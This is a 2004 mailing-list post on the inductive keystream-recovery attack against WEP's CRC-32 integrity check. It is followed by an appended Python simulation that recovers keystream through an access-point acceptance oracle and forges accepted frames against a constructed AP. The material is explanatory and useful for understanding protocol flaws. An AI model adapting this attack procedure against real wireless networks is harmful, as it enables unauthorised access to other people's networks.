Re: WEP attacks based on IV Collisions

From: Ivan Arce (ivan.arce@coresecurity.com)
Date: Tue May 11 2004 - 01:49:16 EDT


Nick Petroni and Bill Arbaugh have outlined an active attack that
would give you full access to a WEP-encrypted wireless LAN
without knowledge of the secret key.
It relies on the lack of integrity checks for the wireless packets,
which lets an attacker inject arbitrary packets into the LAN
without being detected.

The attack does not require you to crack any WEP key and uses
the fact that WEP wrongly uses CRC for integrity checks; this lets
an attacker mount an inductive attack to gradually recover additional
bytes of a pseudorandom stream, provided that N bytes are initially recovered
with a known-plaintext attack. They cite ARP and DHCP requests as effective
for this initial recovery. BTW, you don't really need to *inject* packets
for the initial recovery.

Full description of the attack appeared on:
"The Dangers of Mitigating Security Design Flaws: A Wireless Case Study"
Nick L. Petroni Jr. and William Arbaugh
IEEE Security & Privacy magazine, vol. 1, no. 1, January/February 2003

A powerpoint presentation is available at:
http://www.cs.umd.edu/~waa/wepwep2-attack.html

I am unaware of publicly available tools that implement the attack.
This might be old news, but I am quite surprised that it is not as
popular and widely used as the passive attacks focused on cracking keys.

-ivan

Joshua Wright wrote:

>
> One IP address always exists on every IP network - 255.255.255.255. I've
> been successful at accelerating weak IV collection by injecting ICMP
> Echo requests to the broadcast address on some networks, I'm sure there
> are plenty of other opportunities without knowing the network number.
>
> Fun stuff.
>
> -Josh

-- 
---
To strive, to seek, to find, and not to yield.
- Alfred, Lord Tennyson Ulysses,1842
Ivan Arce
CTO
CORE SECURITY TECHNOLOGIES
46 Farnsworth Street
Boston, MA 02210
Ph: 617-399-6980
Fax: 617-399-6987
ivan.arce@coresecurity.com
www.coresecurity.com
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836  B25D 207B E78E 2AD1 F65A
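As an added illustration that is not part of Ivan's post, of the
Petroni/Arbaugh paper, or of any tool, the Python simulation below walks
through the attack as the post describes it: recover a few keystream bytes
for one IV from a passively captured frame with predictable leading bytes
(the LLC/SNAP header of an ARP request), then use the fact that the ICV is
a plain CRC-32 the attacker can compute to extend the known keystream one
byte per round of at most 256 probes, and finally encrypt an arbitrary
payload under that IV without ever knowing the key. The WEP key, IV, access
point and captured frame are all constructed for the example; the
AccessPoint class and its accepts() method stand in for the real oracle
(whether the AP forwards or answers the probe), and the 802.11 header and
key-ID byte are left out because they play no part in the attack.

```python
"""Simulation of the inductive (chosen-plaintext) attack on WEP's CRC-32 ICV.

Added example, not code from the original post or from Petroni/Arbaugh.
The WEP key, IV, access point and captured frame are all constructed here.
"""
import struct
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP ICV: plain CRC-32 of the payload, transmitted little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame = IV || RC4(IV || key) XOR (payload || ICV).
    802.11 header and key-ID byte omitted; they do not affect the attack."""
    body = payload + icv(payload)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


class AccessPoint:
    """Stands in for the real oracle: a WEP AP decrypts a frame and only
    processes (forwards, answers) it when the ICV matches."""

    def __init__(self, key: bytes) -> None:
        self._key = key

    def accepts(self, frame: bytes) -> bool:
        iv, ct = frame[:3], frame[3:]
        if len(ct) < 4:
            return False
        body = xor(ct, rc4_keystream(iv + self._key, len(ct)))
        return icv(body[:-4]) == body[-4:]


def keystream_from_known_plaintext(frame: bytes, known_prefix: bytes) -> bytes:
    """Initial recovery: a passively captured frame XOR its predictable
    leading bytes (e.g. the LLC/SNAP header of an ARP request) yields that
    many keystream bytes for the frame's IV.  No injection is needed."""
    return xor(frame[3:], known_prefix)


def extend_keystream(ap: AccessPoint, iv: bytes, ks: bytes, extra: int) -> bytes:
    """Inductive step, repeated `extra` times: with n known keystream bytes,
    send an (n-3)-byte message plus its 4-byte ICV (n+1 bytes in total),
    encrypting the first n bytes correctly and the last byte with a guess.
    The AP accepts exactly one of the 256 guesses: the true keystream byte."""
    ks = bytes(ks)
    for _ in range(extra):
        n = len(ks)
        msg = b"A" * (n - 3)          # any content the attacker likes
        body = msg + icv(msg)         # n + 1 bytes; the attacker computes the ICV
        prefix = xor(body[:n], ks)    # correctly encrypted under known keystream
        for guess in range(256):
            frame = iv + prefix + bytes([body[n] ^ guess])
            if ap.accepts(frame):
                ks += bytes([guess])
                break
        else:
            raise RuntimeError("oracle never accepted; not a WEP-style ICV?")
    return ks


def forge_frame(iv: bytes, ks: bytes, payload: bytes) -> bytes:
    """With enough keystream for one IV (WEP allows IV reuse), the attacker
    encrypts arbitrary payloads the AP will accept, without the key."""
    body = payload + icv(payload)
    if len(body) > len(ks):
        raise ValueError("not enough keystream recovered for this payload")
    return iv + xor(body, ks)


def demo() -> dict:
    """Run the full attack against a constructed AP and report the results."""
    key = bytes.fromhex("0102030405")                    # constructed 40-bit key; the attacker never sees it
    ap = AccessPoint(key)
    iv = b"\x11\x22\x33"                                  # IV of the captured frame, reused for every probe
    llc_snap_arp = bytes.fromhex("aaaa030000000806")    # LLC/SNAP header of an ARP frame: known plaintext
    arp_hdr = bytes.fromhex("0001080006040001")          # Ethernet/IPv4 ARP request header (constructed)
    captured = wep_encrypt(key, iv, llc_snap_arp + arp_hdr + b"\x00" * 20)

    ks = keystream_from_known_plaintext(captured, llc_snap_arp)  # 8 bytes from the capture alone
    ks = extend_keystream(ap, iv, ks, 40)                         # 48 bytes after 40 inductive rounds
    forged = forge_frame(iv, ks, b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"injected" * 4)
    return {
        "keystream": ks,
        "matches_true_keystream": ks == rc4_keystream(iv + key, len(ks)),
        "forged_accepted": ap.accepts(forged),
    }


if __name__ == "__main__":
    print(demo())
```

The one thing the simulation hides is how the attacker learns that a probe
was accepted: here accepts() returns a boolean, whereas on a real network the
attacker has to observe a side effect of the AP processing the frame. The
rest is faithful to the mechanism: CRC-32 is keyless, so the attacker can
compute the ICV of any message, and RC4 is a stream cipher, so known keystream
bytes for one IV encrypt any bytes placed in those positions.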

